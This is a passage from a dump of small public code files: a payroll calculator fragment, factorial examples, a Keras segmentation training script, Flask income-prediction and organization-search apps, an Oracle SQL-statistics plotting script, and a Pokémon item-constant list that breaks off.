time_sheet):\r\n return sum(self.calculate_day(work_day) for work_day in time_sheet)\r\n\r\n def calculate_day(self, work_day):\r\n base = Config.WEEKDAY_BASE\r\n if work_day.dotw in ['SA', 'SU']:\r\n base = Config.WEEKEND_BASE\r\n\r\n day_hours = evening_hours = overnight_hours = 0\r\n for hour in range(work_day.start, work_day.end):\r\n if hour < 9:\r\n overnight_hours += 1\r\n elif hour < 18:\r\n day_hours += 1\r\n else:\r\n evening_hours += 1\r\n\r\n return day_hours * base \\\r\n + evening_hours * (base + Config.EVENING_EXTRA) \\\r\n + overnight_hours * (base + Config.OVERNIGHT_EXTRA)\r\n","repo_name":"felipenehmi/payment-calculator","sub_path":"paymentcalculator/command/calculatepayrollcommand.py","file_name":"calculatepayrollcommand.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74905401745","text":"# 팩토리얼\n# 예제 5번 / 2가지 방식으로 구현한 팩토리얼 예제\n\n# 반복적으로 구현\ndef factorial_iterative(n):\n sum = 1\n for i in range (n):\n sum *= i+1\n return sum\n\nprint(factorial_iterative(5))\n\n# 재귀적으로 구현\n\ndef factorial_recursive(n):\n if n > 1:\n return n * factorial_recursive(n-1)\n elif n <= 1:\n return 1\n\nprint(factorial_recursive(5))\n","repo_name":"limnyn/python_codingtest","sub_path":"codingtest/5-5_팩토리얼.py","file_name":"5-5_팩토리얼.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5395048960","text":"from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, EarlyStopping, ReduceLROnPlateau\nfrom IPython.display import clear_output\nfrom keras.optimizers import Adam\nimport numpy as np\nfrom src.train_split_lung import StanderizeVarible\nfrom sklearn.model_selection import train_test_split\nfrom src.train_split_lung import ChooseModel\nfrom src.utils.metrics import dice_coef, dice_coef_loss\nfrom src.utils.PlotMask import PlotTest, PlotMetric\n\nweight_path=\"{}_weights.best.hdf5\".format('cxr_reg')\n\ncheckpoint = ModelCheckpoint(weight_path, monitor='val_loss', verbose=1, \n save_best_only=True, mode='min', save_weights_only = True)\n\nreduceLROnPlat = ReduceLROnPlateau(monitor='val_loss', factor=0.5, \n patience=3, \n verbose=1, mode='min', epsilon=0.0001, cooldown=2, min_lr=1e-6)\nearly = EarlyStopping(monitor=\"val_loss\", \n mode=\"min\", \n patience=15) # probably needs to be more patient, but kaggle time is limited\ncallbacks_list = [checkpoint, early, reduceLROnPlat]\n\n\nimages, mask = 
StanderizeVarible()\n\nmodel = ChooseModel()\nmodel.compile(optimizer=Adam(lr=2e-4), \n loss=[dice_coef_loss], \n metrics = [dice_coef, 'binary_accuracy'])\n\ntrain_vol, validation_vol, train_seg, validation_seg = train_test_split((images-127.0)/127.0, \n (mask>127).astype(np.float32), \n test_size = 0.1,random_state = 2018)\n\ntrain_vol, test_vol, train_seg, test_seg = train_test_split(train_vol,train_seg, \n test_size = 0.1, \n random_state = 2018)\n\nloss_history = model.fit(x = train_vol,\n y = train_seg,\n batch_size = 16,\n epochs = 50,\n validation_data =(test_vol,test_seg) ,\n callbacks=callbacks_list)\n\n\nclear_output()\nPlotMetric(loss_history= loss_history)\nPlotTest(validation_vol= validation_vol, model= model, validation_seg= validation_seg)","repo_name":"christopherohit/Preprocessing-MedicalImage","sub_path":"src/train_non_save_architechture.py","file_name":"train_non_save_architechture.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7941448756","text":"from flask import Flask, render_template, request, jsonify\nfrom flask_cors import CORS,cross_origin\nimport numpy as np\nimport pandas as pd\nfrom pickle import load\n\napp=Flask(__name__)\n\ndef preprocess(df):\n train_set = pd.read_csv('train_data.csv')\n train_set['workclass']=np.where(train_set['workclass']==' Without-pay',' Never-worked',train_set['workclass'])\n train_set['workclass']=np.where(train_set['workclass']==' ?',train_set['workclass'].mode(),train_set['workclass'])\n train_set['occupation']=np.where(train_set['occupation']==' ?',train_set['occupation'].mode(),train_set['occupation']) \n col_labels = ['age', 'workclass', 'fnlwgt', 'education_num','marital_status', 'occupation','relationship', 'race', 'sex', 'capital_gain','capital_loss', 'hours_per_week', 'native_country']\n scaler=load(open('scaler.pkl','rb'))\n df=pd.DataFrame(df,columns=col_labels)\n fq = train_set.groupby('workclass').size()/len(train_set)\n df['workclass']=df['workclass'].map(fq)\n fq=train_set.groupby('marital_status').size()/len(train_set)\n df['marital_status']=df['marital_status'].map(fq)\n fq=train_set.groupby('occupation').size()/len(train_set)\n df['occupation']=df['occupation'].map(fq)\n fq=train_set.groupby('relationship').size()/len(train_set)\n df['relationship']=df['relationship'].map(fq)\n fq=train_set.groupby('race').size()/len(train_set)\n df['race']=df['race'].map(fq)\n df['sex']=np.where(df['sex']==' Male',0,1)\n df['native_country']=np.where(df['native_country']==' United-States',1,0)\n df=scaler.transform(df)\n df=pd.DataFrame(df,columns=col_labels)\n return(df)\n\n@app.route('/',methods=['GET'])\n@cross_origin()\ndef homePage():\n return render_template(\"index.html\")\n\n@app.route('/predict',methods=['GET','POST'])\n@cross_origin()\ndef index():\n try:\n age=float(request.form['age'])\n wrkcls=str(request.form['wrkcls'])\n fnlwgt=float(request.form['fnlwgt'])\n education_num=str(request.form['education_num'])\n marital_status=str(request.form['marital_status'])\n occupation=str(request.form['occupation'])\n relationship=str(request.form['relationship'])\n race=str(request.form['race'])\n sex=str(request.form['sex'])\n cap_gain=float(request.form['cap_gain'])\n cap_loss=float(request.form['cap_loss'])\n hourspweek=float(request.form['hourspweek'])\n native_count=str(request.form['native_count'])\n final_arr=np.array([[age, wrkcls, fnlwgt, education_num, marital_status, occupation,relationship, race, sex, 
cap_gain, cap_loss,hourspweek, native_count]])\n        model=load(open('model.pkl','rb'))\n        prediction=model.predict(preprocess(final_arr))\n        if prediction[0]==0:\n            prediction=\"less than $50K.\"\n        else:\n            prediction=\"more than $50K.\"\n        return render_template('results.html',prediction=prediction)\n    except Exception as e:\n        print('The Exception message is: ',e)\n        return 'Something went wrong. Go back and try again.'\n\n\nif __name__==\"__main__\":\n    app.run(debug=True)","repo_name":"shiv0112/income-prediction-xgboost","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41140323160","text":"import logging\nlogging.basicConfig(level=logging.DEBUG)\n\ncommand = input(\"What would you like to do? \")\nif command == \"exit\":\n    logging.info(\"Thanks a lot, see you!\")\n    exit()\n\nitems = {\"kebab\", \"pizza\", \"makaron\", \"burger\"}","repo_name":"Kacperek32/Magazyn","sub_path":"magazyn.py","file_name":"magazyn.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4830283456","text":"import myplot\nimport util\n\ndef simplesqlstat(sql_id,start_time,end_time,instance_number):\n    q_string = \"\"\"\nselect \nEND_INTERVAL_TIME,\nexecutions_delta,\nELAPSED_TIME_DELTA/(nonzeroexecutions*1000) ELAPSED_AVG_MS\nfrom \n(\nselect \nss.snap_id,\nss.sql_id,\nss.plan_hash_value,\nsn.END_INTERVAL_TIME,\nss.executions_delta,\ncase ss.executions_delta when 0 then 1 else ss.executions_delta end nonzeroexecutions,\nELAPSED_TIME_DELTA\nfrom\nDBA_HIST_SQLSTAT ss,DBA_HIST_SNAPSHOT sn\nwhere ss.sql_id = '\"\"\" \n    q_string += sql_id\n    q_string += \"\"\"'\nand ss.snap_id=sn.snap_id\nand ss.INSTANCE_NUMBER = \"\"\"\n    q_string += instance_number\n    q_string += \"\"\"\nand ss.INSTANCE_NUMBER=sn.INSTANCE_NUMBER and\nEND_INTERVAL_TIME \nbetween \nto_date('\"\"\" \n    q_string += start_time\n    q_string += \"\"\"','DD-MON-YYYY HH24:MI:SS')\nand \nto_date('\"\"\"\n    q_string += end_time\n    q_string += \"\"\"','DD-MON-YYYY HH24:MI:SS')\n)\norder by snap_id,sql_id\"\"\"\n    return q_string\n\ndatabase,dbconnection = util.script_startup('Run statistics for one SQL id')\n\nstart_time=util.input_with_default('Start date and time (DD-MON-YYYY HH24:MI:SS)','01-JAN-1900 12:00:00')\n\nend_time=util.input_with_default('End date and time (DD-MON-YYYY HH24:MI:SS)','01-JAN-2200 12:00:00')\n\ninstance_number=util.input_with_default('Database Instance (1 if not RAC)','1')\n\n# Get user input\n\nsql_id=util.input_with_default('SQL_ID','acrg0q0qtx3gr')\n\nq = simplesqlstat(sql_id,start_time,end_time,instance_number)\n\nr = dbconnection.run_return_flipped_results(q)\n\n# plot query\n \nmyplot.title = \"Sql_id \"+sql_id+\" on \"+database+\" database, instance \"+instance_number\nmyplot.ylabel1 = \"Number of executions\"\nmyplot.ylabel2 = \"Averaged Elapsed Milliseconds\"\n\nutil.exit_no_results(r)\n\nmyplot.xdatetimes = r[0]\nmyplot.ylists = r[1:]\n\nmyplot.line_2subplots()","repo_name":"bobbydurrett/PythonDBAGraphs","sub_path":"simplesqlstat.py","file_name":"simplesqlstat.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"48"} +{"seq_id":"2572020452","text":"from models import app, db, Country, Disaster, Organization\nfrom schemas import (\n    DisasterSchema,\n    DisasterInstanceSchema,\n    CountrySchema,\n    
CountryInstanceSchema,\n OrganizationSchema,\n OrganizationInstanceSchema,\n country_schema,\n disaster_schema,\n organization_schema,\n)\nimport flask_sqlalchemy\nfrom sqlalchemy import or_\nfrom query_finder import *\n\n\ndef search_organizations(query, q):\n if q == None:\n return query\n\n queries = q.split(\" \")\n print(queries)\n\n items = []\n for item in queries:\n items.append(Organization.name.ilike(\"%{}%\".format(item)))\n try:\n items.append(Organization.score.in_([int(item)]))\n except ValueError:\n pass\n try:\n items.append(Organization.rating.in_([int(item)]))\n except ValueError:\n pass\n items.append(Organization.category.ilike(\"%{}%\".format(item)))\n items.append(Organization.cause.ilike(\"%{}%\".format(item)))\n\n query = query.filter(or_(*tuple(items)))\n return query\n\n\ndef filter_organizations(query, queries):\n cause = get_query(\"cause\", queries)\n rating = get_query(\"rating\", queries)\n\n if cause != None:\n query = query.filter(Organization.cause.in_(cause))\n\n if rating != None:\n query = query.filter(Organization.rating.in_(rating))\n\n return query\n\n\ndef sort_organizations(sort, query):\n # sort = sort.split(\"-\")\n\n category = None\n if sort == \"name\":\n category = Organization.name\n elif sort == \"income\":\n category = Organization.income\n elif sort == \"score\":\n category = Organization.score\n else:\n category = Organization.id\n\n return query.order_by(category)\n","repo_name":"amodica/Diminishing-Disasters","sub_path":"backend/Organization.py","file_name":"Organization.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4815103930","text":"LEEK = 'Leek'\r\nREPEL = 'Repel'\r\nSUPER_REPEL = 'Super_Repel'\r\nMAX_REPEL = 'Max_Repel'\r\nBLACK_FLUTE = 'Black_Flute'\r\nWHITE_FLUTE = 'White_Flute'\r\nHONEY = 'Honey'\r\nESCAPE_ROPE = 'Escape_Rope'\r\nRED_SHARD = 'Red_Shard'\r\nYELLOW_SHARD = 'Yellow_Shard'\r\nBLUE_SHARD = 'Blue_Shard'\r\nGREEN_SHARD = 'Green_Shard'\r\nFIRE_STONE = 'Fire_Stone'\r\nTHUNDER_STONE = 'Thunder_Stone'\r\nWATER_STONE = 'Water_Stone'\r\nLEAF_STONE = 'Leaf_Stone'\r\nMOON_STONE = 'Moon_Stone'\r\nSUN_STONE = 'Sun_Stone'\r\nDUSK_STONE = 'Dusk_Stone'\r\nDAWN_STONE = 'Dawn_Stone'\r\nSHINY_STONE = 'Shiny_Stone'\r\nRED_APRICORN = 'Red_Apricorn'\r\nYELLOW_APRICORN = 'Yellow_Apricorn'\r\nBLUE_APRICORN = 'Blue_Apricorn'\r\nGREEN_APRICORN = 'Green_Apricorn'\r\nPINK_APRICORN = 'Pink_Apricorn'\r\nWHITE_APRICORN = 'White_Apricorn'\r\nBLACK_APRICORN = 'Black_Apricorn'\r\nHELIX_FOSSIL = 'Helix_Fossil'\r\nDOME_FOSSIL = 'Dome_Fossil'\r\nOLD_AMBER = 'Old_Amber'\r\nROOT_FOSSIL = 'Root_Fossil'\r\nCLAW_FOSSIL = 'Claw_Fossil'\r\nSKULL_FOSSIL = 'Skull_Fossil'\r\nARMOR_FOSSIL = 'Armor_Fossil'\r\nCOVER_FOSSIL = 'Cover_Fossil'\r\nPLUME_FOSSIL = 'Plume_Fossil'\r\nPRETTY_WING = 'Pretty_Wing'\r\nTINY_MUSHROOM = 'Tiny_Mushroom'\r\nBIG_MUSHROOM = 'Big_Mushroom'\r\nBALM_MUSHROOM = 'Balm_Mushroom'\r\nPEARL = 'Pearl'\r\nBIG_PEARL = 'Big_Pearl'\r\nPEARL_STRING = 'Pearl_String'\r\nSTARDUST = 'Stardust'\r\nSTAR_PIECE = 'Star_Piece'\r\nCOMET_SHARD = 'Comet_Shard'\r\nNUGGET = 'Nugget'\r\nBIG_NUGGET = 'Big_Nugget'\r\nHEART_SCALE = 'Heart_Scale'\r\nSLOWPOKE_TAIL = 'Slowpoke_Tail'\r\nRARE_BONE = 'Rare_Bone'\r\nRELIC_COPPER = 'Relic_Copper'\r\nRELIC_SILVER = 'Relic_Silver'\r\nRELIC_GOLD = 'Relic_Gold'\r\nRELIC_VASE = 'Relic_Vase'\r\nRELIC_BAND = 'Relic_Band'\r\nRELIC_STATUE = 'Relic_Statue'\r\nRELIC_CROWN = 'Relic_Crown'\r\nGROWTH_MULCH = 
'Growth_Mulch'\r\nDAMP_MULCH = 'Damp_Mulch'\r\nSTABLE_MULCH = 'Stable_Mulch'\r\nGOOEY_MULCH = 'Gooey_Mulch'\r\nSHOAL_SALT = 'Shoal_Salt'\r\nSHOAL_SHELL = 'Shoal_Shell'\r\nODD_KEYSTONE = 'Odd_Keystone'\r\nAIR_BALLOON = 'Air_Balloon'\r\nBRIGHT_POWDER = 'Bright_Powder'\r\nEVIOLITE = 'Eviolite'\r\nFLOAT_STONE = 'Float_Stone'\r\nDESTINY_KNOT = 'Destiny_Knot'\r\nROCKY_HELMET = 'Rocky_Helmet'\r\nEJECT_BUTTON = 'Eject_Button'\r\nRED_CARD = 'Red_Card'\r\nSHED_SHELL = 'Shed_Shell'\r\nSMOKE_BALL = 'Smoke_Ball'\r\nLUCKY_EGG = 'Lucky_Egg'\r\nEXP_SHARE = 'Exp_Share'\r\nAMULET_COIN = 'Amulet_Coin'\r\nSOOTHE_BELL = 'Soothe_Bell'\r\nCLEANSE_TAG = 'Cleanse_Tag'\r\nCHOICE_BAND = 'Choice_Band'\r\nCHOICE_SPECS = 'Choice_Specs'\r\nCHOICE_SCARF = 'Choice_Scarf'\r\nHEAT_ROCK = 'Heat_Rock'\r\nDAMP_ROCK = 'Damp_Rock'\r\nSMOOTH_ROCK = 'Smooth_Rock'\r\nICY_ROCK = 'Icy_Rock'\r\nLIGHT_CLAY = 'Light_Clay'\r\nGRIP_CLAW = 'Grip_Claw'\r\nBINDING_BAND = 'Binding_Band'\r\nBIG_ROOT = 'Big_Root'\r\nBLACK_SLUDGE = 'Black_Sludge'\r\nLEFTOVERS = 'Leftovers'\r\nSHELL_BELL = 'Shell_Bell'\r\nMENTAL_HERB = 'Mental_Herb'\r\nWHITE_HERB = 'White_Herb'\r\nPOWER_HERB = 'Power_Herb'\r\nABSORB_BULB = 'Absorb_Bulb'\r\nCELL_BATTERY = 'Cell_Battery'\r\nLIFE_ORB = 'Life_Orb'\r\nEXPERT_BELT = 'Expert_Belt'\r\nMETRONOME = 'Metronome'\r\nMUSCLE_BAND = 'Muscle_Band'\r\nWISE_GLASSES = 'Wise_Glasses'\r\nRAZOR_CLAW = 'Razor_Claw'\r\nSCOPE_LENS = 'Scope_Lens'\r\nWIDE_LENS = 'Wide_Lens'\r\nZOOM_LENS = 'Zoom_Lens'\r\nKINGS_ROCK = 'Kings_Rock'\r\nRAZOR_FANG = 'Razor_Fang'\r\nLAGGING_TAIL = 'Lagging_Tail'\r\nQUICK_CLAW = 'Quick_Claw'\r\nFOCUS_BAND = 'Focus_Band'\r\nFOCUS_SASH = 'Focus_Sash'\r\nFLAME_ORB = 'Flame_Orb'\r\nTOXIC_ORB = 'Toxic_Orb'\r\nSTICKY_BARB = 'Sticky_Barb'\r\nIRON_BALL = 'Iron_Ball'\r\nRING_TARGET = 'Ring_Target'\r\nMACHO_BRACE = 'Macho_Brace'\r\nPOWER_WEIGHT = 'Power_Weight'\r\nPOWER_BRACER = 'Power_Bracer'\r\nPOWER_BELT = 'Power_Belt'\r\nPOWER_LENS = 'Power_Lens'\r\nPOWER_BAND = 'Power_Band'\r\nPOWER_ANKLET = 'Power_Anklet'\r\nLAX_INCENSE = 'Lax_Incense'\r\nFULL_INCENSE = 'Full_Incense'\r\nLUCK_INCENSE = 'Luck_Incense'\r\nPURE_INCENSE = 'Pure_Incense'\r\nSEA_INCENSE = 'Sea_Incense'\r\nWAVE_INCENSE = 'Wave_Incense'\r\nROSE_INCENSE = 'Rose_Incense'\r\nODD_INCENSE = 'Odd_Incense'\r\nROCK_INCENSE = 'Rock_Incense'\r\nCHARCOAL = 'Charcoal'\r\nMYSTIC_WATER = 'Mystic_Water'\r\nMAGNET = 'Magnet'\r\nMIRACLE_SEED = 'Miracle_Seed'\r\nNEVER_MELT_ICE = 'Never_Melt_Ice'\r\nBLACK_BELT = 'Black_Belt'\r\nPOISON_BARB = 'Poison_Barb'\r\nSOFT_SAND = 'Soft_Sand'\r\nSHARP_BEAK = 'Sharp_Beak'\r\nTWISTED_SPOON = 'Twisted_Spoon'\r\nSILVER_POWDER = 'Silver_Powder'\r\nHARD_STONE = 'Hard_Stone'\r\nSPELL_TAG = 'Spell_Tag'\r\nDRAGON_FANG = 'Dragon_Fang'\r\nBLACK_GLASSES = 'Black_Glasses'\r\nMETAL_COAT = 'Metal_Coat'\r\nSILK_SCARF = 'Silk_Scarf'\r\nFLAME_PLATE = 'Flame_Plate'\r\nSPLASH_PLATE = 'Splash_Plate'\r\nZAP_PLATE = 'Zap_Plate'\r\nMEADOW_PLATE = 'Meadow_Plate'\r\nICICLE_PLATE = 'Icicle_Plate'\r\nFIST_PLATE = 'Fist_Plate'\r\nTOXIC_PLATE = 'Toxic_Plate'\r\nEARTH_PLATE = 'Earth_Plate'\r\nSKY_PLATE = 'Sky_Plate'\r\nMIND_PLATE = 'Mind_Plate'\r\nINSECT_PLATE = 'Insect_Plate'\r\nSTONE_PLATE = 'Stone_Plate'\r\nSPOOKY_PLATE = 'Spooky_Plate'\r\nDRACO_PLATE = 'Draco_Plate'\r\nDREAD_PLATE = 'Dread_Plate'\r\nIRON_PLATE = 'Iron_Plate'\r\nFIRE_GEM = 'Fire_Gem'\r\nWATER_GEM = 'Water_Gem'\r\nELECTRIC_GEM = 'Electric_Gem'\r\nGRASS_GEM = 'Grass_Gem'\r\nICE_GEM = 'Ice_Gem'\r\nFIGHTING_GEM = 'Fighting_Gem'\r\nPOISON_GEM = 'Poison_Gem'\r\nGROUND_GEM = 'Ground_Gem'\r\nFLYING_GEM = 
'Flying_Gem'\r\nPSYCHIC_GEM = 'Psychic_Gem'\r\nBUG_GEM = 'Bug_Gem'\r\nROCK_GEM = 'Rock_Gem'\r\nGHOST_GEM = 'Ghost_Gem'\r\nDRAGON_GEM = 'Dragon_Gem'\r\nDARK_GEM = 'Dark_Gem'\r\nSTEEL_GEM = 'Steel_Gem'\r\nNORMAL_GEM = 'Normal_Gem'\r\nLIGHT_BALL = 'Light_Ball'\r\nLUCKY_PUNCH = 'Lucky_Punch'\r\nMETAL_POWDER = 'Metal_Powder'\r\nQUICK_POWDER = 'Quick_Powder'\r\nTHICK_CLUB = 'Thick_Club'\r\nSTICK = 'Stick'\r\nSOUL_DEW = 'Soul_Dew'\r\nDEEP_SEA_TOOTH = 'Deep_Sea_Tooth'\r\nDEEP_SEA_SCALE = 'Deep_Sea_Scale'\r\nADAMANT_ORB = 'Adamant_Orb'\r\nLUSTROUS_ORB = 'Lustrous_Orb'\r\nGRISEOUS_ORB = 'Griseous_Orb'\r\nDOUSE_DRIVE = 'Douse_Drive'\r\nSHOCK_DRIVE = 'Shock_Drive'\r\nBURN_DRIVE = 'Burn_Drive'\r\nCHILL_DRIVE = 'Chill_Drive'\r\nEVERSTONE = 'Everstone'\r\nDRAGON_SCALE = 'Dragon_Scale'\r\nUPGRADE = 'Upgrade'\r\nDUBIOUS_DISC = 'Dubious_Disc'\r\nPROTECTOR = 'Protector'\r\nELECTIRIZER = 'Electirizer'\r\nMAGMARIZER = 'Magmarizer'\r\nREAPER_CLOTH = 'Reaper_Cloth'\r\nPRISM_SCALE = 'Prism_Scale'\r\nOVAL_STONE = 'Oval_Stone'\r\nRED_SCARF = 'Red_Scarf'\r\nBLUE_SCARF = 'Blue_Scarf'\r\nPINK_SCARF = 'Pink_Scarf'\r\nGREEN_SCARF = 'Green_Scarf'\r\nYELLOW_SCARF = 'Yellow_Scarf'\r\nPOTION = 'Potion'\r\nSUPER_POTION = 'Super_Potion'\r\nHYPER_POTION = 'Hyper_Potion'\r\nMAX_POTION = 'Max_Potion'\r\nFULL_RESTORE = 'Full_Restore'\r\nSACRED_ASH = 'Sacred_Ash'\r\nAWAKENING = 'Awakening'\r\nANTIDOTE = 'Antidote'\r\nBURN_HEAL = 'Burn_Heal'\r\nPARALYZE_HEAL = 'Paralyze_Heal'\r\nICE_HEAL = 'Ice_Heal'\r\nFULL_HEAL = 'Full_Heal'\r\nLAVA_COOKIE = 'Lava_Cookie'\r\nOLD_GATEAU = 'Old_Gateau'\r\nCASTELIACONE = 'Casteliacone'\r\nREVIVE = 'Revive'\r\nMAX_REVIVE = 'Max_Revive'\r\nBERRY_JUICE = 'Berry_Juice'\r\nRAGE_CANDY_BAR = 'Rage_Candy_Bar'\r\nSWEET_HEART = 'Sweet_Heart'\r\nFRESH_WATER = 'Fresh_Water'\r\nSODA_POP = 'Soda_Pop'\r\nLEMONADE = 'Lemonade'\r\nMOOMOO_MILK = 'Moomoo_Milk'\r\nENERGY_POWDER = 'Energy_Powder'\r\nENERGY_ROOT = 'Energy_Root'\r\nHEAL_POWDER = 'Heal_Powder'\r\nREVIVAL_HERB = 'Revival_Herb'\r\nETHER = 'Ether'\r\nMAX_ETHER = 'Max_Ether'\r\nELIXIR = 'Elixir'\r\nMAX_ELIXIR = 'Max_Elixir'\r\nPP_UP = 'PP_Up'\r\nPP_MAX = 'PP_Max'\r\nHP_UP = 'HP_Up'\r\nPROTEIN = 'Protein'\r\nIRON = 'Iron'\r\nCALCIUM = 'Calcium'\r\nZINC = 'Zinc'\r\nCARBOS = 'Carbos'\r\nHEALTH_WING = 'Health_Wing'\r\nMUSCLE_WING = 'Muscle_Wing'\r\nRESIST_WING = 'Resist_Wing'\r\nGENIUS_WING = 'Genius_Wing'\r\nCLEVER_WING = 'Clever_Wing'\r\nSWIFT_WING = 'Swift_Wing'\r\nRARE_CANDY = 'Rare_Candy'\r\nMASTER_BALL = 'Master_Ball'\r\nULTRA_BALL = 'Ultra_Ball'\r\nGREAT_BALL = 'Great_Ball'\r\nPOKE_BALL = 'Poke_Ball'\r\nSAFARI_BALL = 'Safari_Ball'\r\nSPORT_BALL = 'Sport_Ball'\r\nNET_BALL = 'Net_Ball'\r\nDIVE_BALL = 'Dive_Ball'\r\nNEST_BALL = 'Nest_Ball'\r\nREPEAT_BALL = 'Repeat_Ball'\r\nTIMER_BALL = 'Timer_Ball'\r\nLUXURY_BALL = 'Luxury_Ball'\r\nPREMIER_BALL = 'Premier_Ball'\r\nDUSK_BALL = 'Dusk_Ball'\r\nHEAL_BALL = 'Heal_Ball'\r\nQUICK_BALL = 'Quick_Ball'\r\nCHERISH_BALL = 'Cherish_Ball'\r\nFAST_BALL = 'Fast_Ball'\r\nLEVEL_BALL = 'Level_Ball'\r\nLURE_BALL = 'Lure_Ball'\r\nHEAVY_BALL = 'Heavy_Ball'\r\nLOVE_BALL = 'Love_Ball'\r\nFRIEND_BALL = 'Friend_Ball'\r\nMOON_BALL = 'Moon_Ball'\r\nTM01 = 'TM01'\r\nTM02 = 'TM02'\r\nTM03 = 'TM03'\r\nTM04 = 'TM04'\r\nTM05 = 'TM05'\r\nTM06 = 'TM06'\r\nTM07 = 'TM07'\r\nTM08 = 'TM08'\r\nTM09 = 'TM09'\r\nTM10 = 'TM10'\r\nTM11 = 'TM11'\r\nTM12 = 'TM12'\r\nTM13 = 'TM13'\r\nTM14 = 'TM14'\r\nTM15 = 'TM15'\r\nTM16 = 'TM16'\r\nTM17 = 'TM17'\r\nTM18 = 'TM18'\r\nTM19 = 'TM19'\r\nTM20 = 'TM20'\r\nTM21 = 'TM21'\r\nTM22 = 'TM22'\r\nTM23 = 'TM23'\r\nTM24 
= 'TM24'\r\nTM25 = 'TM25'\r\nTM26 = 'TM26'\r\nTM27 = 'TM27'\r\nTM28 = 'TM28'\r\nTM29 = 'TM29'\r\nTM30 = 'TM30'\r\nTM31 = 'TM31'\r\nTM32 = 'TM32'\r\nTM33 = 'TM33'\r\nTM34 = 'TM34'\r\nTM35 = 'TM35'\r\nTM36 = 'TM36'\r\nTM37 = 'TM37'\r\nTM38 = 'TM38'\r\nTM39 = 'TM39'\r\nTM40 = 'TM40'\r\nTM41 = 'TM41'\r\nTM42 = 'TM42'\r\nTM43 = 'TM43'\r\nTM44 = 'TM44'\r\nTM45 = 'TM45'\r\nTM46 = 'TM46'\r\nTM47 = 'TM47'\r\nTM48 = 'TM48'\r\nTM49 = 'TM49'\r\nTM50 = 'TM50'\r\nTM51 = 'TM51'\r\nTM52 = 'TM52'\r\nTM53 = 'TM53'\r\nTM54 = 'TM54'\r\nTM55 = 'TM55'\r\nTM56 = 'TM56'\r\nTM57 = 'TM57'\r\nTM58 = 'TM58'\r\nTM59 = 'TM59'\r\nTM60 = 'TM60'\r\nTM61 = 'TM61'\r\nTM62 = 'TM62'\r\nTM63 = 'TM63'\r\nTM64 = 'TM64'\r\nTM65 = 'TM65'\r\nTM66 = 'TM66'\r\nTM67 = 'TM67'\r\nTM68 = 'TM68'\r\nTM69 = 'TM69'\r\nTM70 = 'TM70'\r\nTM71 = 'TM71'\r\nTM72 = 'TM72'\r\nTM73 = 'TM73'\r\nTM74 = 'TM74'\r\nTM75 = 'TM75'\r\nTM76 = 'TM76'\r\nTM77 = 'TM77'\r\nTM78 = 'TM78'\r\nTM79 = 'TM79'\r\nTM80 = 'TM80'\r\nTM81 = 'TM81'\r\nTM82 = 'TM82'\r\nTM83 = 'TM83'\r\nTM84 = 'TM84'\r\nTM85 = 'TM85'\r\nTM86 = 'TM86'\r\nTM87 = 'TM87'\r\nTM88 = 'TM88'\r\nTM89 = 'TM89'\r\nTM90 = 'TM90'\r\nTM91 = 'TM91'\r\nTM92 = 'TM92'\r\nTM93 = 'TM93'\r\nTM94 = 'TM94'\r\nTM95 = 'TM95'\r\nHM01 = 'HM01'\r\nHM02 = 'HM02'\r\nHM03 = 'HM03'\r\nHM04 = 'HM04'\r\nHM05 = 'HM05'\r\nHM06 = 'HM06'\r\nCHERI_BERRY = 'Cheri_Berry'\r\nCHESTO_BERRY = 'Chesto_Berry'\r\nPECHA_BERRY = 'Pecha_Berry'\r\nRAWST_BERRY = 'Rawst_Berry'\r\nASPEAR_BERRY = 'Aspear_Berry'\r\nLEPPA_BERRY = 'Leppa_Berry'\r\nORAN_BERRY = 'Oran_Berry'\r\nPERSIM_BERRY = 'Persim_Berry'\r\nLUM_BERRY = 'Lum_Berry'\r\nSITRUS_BERRY = 'Sitrus_Berry'\r\nFIGY_BERRY = 'Figy_Berry'\r\nWIKI_BERRY = 'Wiki_Berry'\r\nMAGO_BERRY = 'Mago_Berry'\r\nAGUAV_BERRY = 'Aguav_Berry'\r\nIAPAPA_BERRY = 'Iapapa_Berry'\r\nRAZZ_BERRY = 'Razz_Berry'\r\nBLUK_BERRY = 'Bluk_Berry'\r\nNANAB_BERRY = 'Nanab_Berry'\r\nWEPEAR_BERRY = 'Wepear_Berry'\r\nPINAP_BERRY = 'Pinap_Berry'\r\nPOMEG_BERRY = 'Pomeg_Berry'\r\nKELPSY_BERRY = 'Kelpsy_Berry'\r\nQUALOT_BERRY = 'Qualot_Berry'\r\nHONDEW_BERRY = 'Hondew_Berry'\r\nGREPA_BERRY = 'Grepa_Berry'\r\nTAMATO_BERRY = 'Tamato_Berry'\r\nCORNN_BERRY = 'Cornn_Berry'\r\nMAGOST_BERRY = 'Magost_Berry'\r\nRABUTA_BERRY = 'Rabuta_Berry'\r\nNOMEL_BERRY = 'Nomel_Berry'\r\nSPELON_BERRY = 'Spelon_Berry'\r\nPAMTRE_BERRY = 'Pamtre_Berry'\r\nWATMEL_BERRY = 'Watmel_Berry'\r\nDURIN_BERRY = 'Durin_Berry'\r\nBELUE_BERRY = 'Belue_Berry'\r\nOCCA_BERRY = 'Occa_Berry'\r\nPASSHO_BERRY = 'Passho_Berry'\r\nWACAN_BERRY = 'Wacan_Berry'\r\nRINDO_BERRY = 'Rindo_Berry'\r\nYACHE_BERRY = 'Yache_Berry'\r\nCHOPLE_BERRY = 'Chople_Berry'\r\nKEBIA_BERRY = 'Kebia_Berry'\r\nSHUCA_BERRY = 'Shuca_Berry'\r\nCOBA_BERRY = 'Coba_Berry'\r\nPAYAPA_BERRY = 'Payapa_Berry'\r\nTANGA_BERRY = 